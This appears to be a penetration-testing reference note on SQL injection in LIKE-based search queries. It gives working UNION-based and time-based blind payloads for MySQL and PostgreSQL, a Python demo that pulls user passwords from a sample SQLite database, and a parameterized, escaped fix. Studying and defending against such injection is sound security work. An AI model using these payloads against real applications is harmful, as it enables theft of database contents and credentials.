**Vulnerable Code**

LIKE clauses are heavily used in search features. Developers often concatenate user input directly between wildcard (`%`) characters inside a quoted string. To break out, close the initial string quote with a `'`, then deal with the trailing `%'` that follows your input: either comment it out, or neutralize it by appending a comparison that the trailing characters complete into something always true.
```java
// Vulnerable Context: input wrapped in wildcards and string quotes
String searchTerm = request.getParameter("search");
String query = "SELECT title, body FROM articles WHERE title LIKE '%" + searchTerm + "%'";
```
**Where To Look For The Vulnerability**
Look for any feature that searches for partial text matches.
- **Search Bars:** Finding a user, product, or article.
- **URL Parameters:** `?q=`, `?search=`, `?filter=`, `?keyword=`
- **Autocomplete/Typeahead:** API endpoints that fetch results as you type.
**Payloads**

```sql
-- Universal Bypass (works on Contains, Starts With and Ends With).
-- The comment swallows the trailing %' ; MySQL requires whitespace after --,
-- so a trailing " -" is appended to make the comment valid everywhere.
test' UNION {SELECT_query}-- -

-- Logical Closures (use if comments are filtered).
-- The injected SELECT must carry its own WHERE clause (e.g. ... WHERE 1=1)
-- so the trailing AND has a condition to attach to.
-- For "Contains" (LIKE '%{input}%'), the wrapper's %' completes '%'='%':
test' UNION {SELECT_query} AND '%'='
-- For "Starts With" (LIKE '{input}%'), the wrapper's %' completes '%'='%':
test' UNION {SELECT_query} AND '%'='
-- For "Ends With" (LIKE '%{input}'), the wrapper's ' completes ''='':
test' UNION {SELECT_query} AND ''='
```
```sql
-- Time-Based (blind) Syntax: [Valid Search]' AND [Sleep Function]-- -

-- MySQL: if the connected account is "admin", sleep 5 seconds.
-- USER() returns user@host, so the host part is stripped before comparing;
-- a bare "user" is not a column or function and would error.
test' AND IF(SUBSTRING_INDEX(USER(),'@',1)='admin', SLEEP(5), 0)-- -

-- PostgreSQL: pg_sleep() returns void, which cannot be an operand of AND,
-- so the condition picks the delay and the call is wrapped in a comparison.
test' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN current_user='admin' THEN 5 ELSE 0 END))-- -
```
**Mitigation**

Fix: use prepared statements, binding the whole pattern (wildcards included) as a parameter instead of concatenating the input into the SQL string. Prepared statements stop the break-out, but they do not stop `%` and `_` in the input from acting as wildcards. If the application needs to treat user input as literal characters, escape `%`, `_` and the escape character itself (e.g. `\%`, `\_`, `\\`) before building the pattern, and declare the escape character explicitly with `LIKE ? ESCAPE '\'` so the behaviour does not depend on the database's default (MySQL and PostgreSQL default to backslash; SQLite and SQL Server have no default).
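The following is an added, runnable demonstration and not code from the original note. It uses an in-memory SQLite database with constructed `articles` and `users` tables to stand in for the application's database, rebuilds the vulnerable string concatenation from the Java snippet for all three wrapper styles, runs the comment bypass and the three logical closures against it, and then shows the parameterized-plus-escaped fix. `INJECTED_SELECT` is an assumed stand-in for the note's `{SELECT_query}` placeholder; the table names, rows and credentials are invented for the example.

```python
import sqlite3

# Constructed sample data; none of it is from the original note.
SCHEMA_AND_DATA = """
CREATE TABLE articles (title TEXT, body TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO articles VALUES ('100% uptime', 'SLA notes');
INSERT INTO articles VALUES ('100 days of code', 'Diary');
INSERT INTO articles VALUES ('Testing LIKE', 'Search tips');
INSERT INTO users VALUES ('admin', 'hunter2');
INSERT INTO users VALUES ('bob', 'letmein');
"""

# Wildcards placed around the input for each search style: (prefix, suffix).
WRAPPERS = {
    "contains":    ("%", "%"),   # LIKE '%{input}%'
    "starts_with": ("",  "%"),   # LIKE '{input}%'
    "ends_with":   ("%", ""),    # LIKE '%{input}'
}

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA_AND_DATA)
    return conn

def vulnerable_search(conn, search_term, mode="contains"):
    """Same construction as the Java snippet: input concatenated between wildcards."""
    pre, post = WRAPPERS[mode]
    query = f"SELECT title, body FROM articles WHERE title LIKE '{pre}{search_term}{post}'"
    return sorted(conn.execute(query).fetchall())

# Assumed stand-in for the note's {SELECT_query}. It carries its own WHERE so
# the trailing AND of the logical closures has a condition to attach to.
INJECTED_SELECT = "SELECT username, password FROM users WHERE 1=1"

PAYLOADS = {
    # Universal bypass: the comment swallows the trailing wildcard and quote.
    "comment":     f"test' UNION {INJECTED_SELECT}-- -",
    # Logical closures for when comments are filtered; each reuses the
    # wrapper's own trailing characters to complete an always-true comparison.
    "contains":    f"test' UNION {INJECTED_SELECT} AND '%'='",
    "starts_with": f"test' UNION {INJECTED_SELECT} AND '%'='",
    "ends_with":   f"test' UNION {INJECTED_SELECT} AND ''='",
}

def exploit(conn, payload_name, mode):
    """Run a payload through the vulnerable search; the rows that come back are users."""
    return vulnerable_search(conn, PAYLOADS[payload_name], mode)

ESCAPE_CHAR = "\\"   # a single backslash

def escape_like(term, esc=ESCAPE_CHAR):
    """Neutralise LIKE metacharacters. The escape character is handled first so
    the escapes added for % and _ are not themselves escaped again."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))

def safe_search(conn, search_term, mode="contains"):
    """Fixed version: whole pattern bound as a parameter, input escaped, and the
    escape character declared explicitly rather than relying on a DB default."""
    pre, post = WRAPPERS[mode]
    pattern = f"{pre}{escape_like(search_term)}{post}"
    query = "SELECT title, body FROM articles WHERE title LIKE ? ESCAPE '\\'"
    return sorted(conn.execute(query, (pattern,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    for name, mode in [("comment", "contains"), ("contains", "contains"),
                       ("starts_with", "starts_with"), ("ends_with", "ends_with")]:
        print(f"{name:12s} via {mode:12s}:", exploit(db, name, mode))
    print("vulnerable '100%':", vulnerable_search(db, "100%"))   # wildcard honoured
    print("safe '100%':      ", safe_search(db, "100%"))         # literal match only
    print("safe payload:     ", safe_search(db, PAYLOADS["contains"]))
```

Each exploit call returns the two `users` rows dressed up as articles, while the fixed search returns nothing for the same payload. The `100%` search shows the second half of the mitigation: the parameterized query alone would still honour the `%` and match `100 days of code`, whereas escaping it matches only the title that literally contains `100%`.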
**Related Usage**

```dataview
TABLE creation_date AS "Created" FROM "05 - Content" WHERE contains(techniques, this.file.link) AND contains(tags, "🚩") SORT file.name ASC
```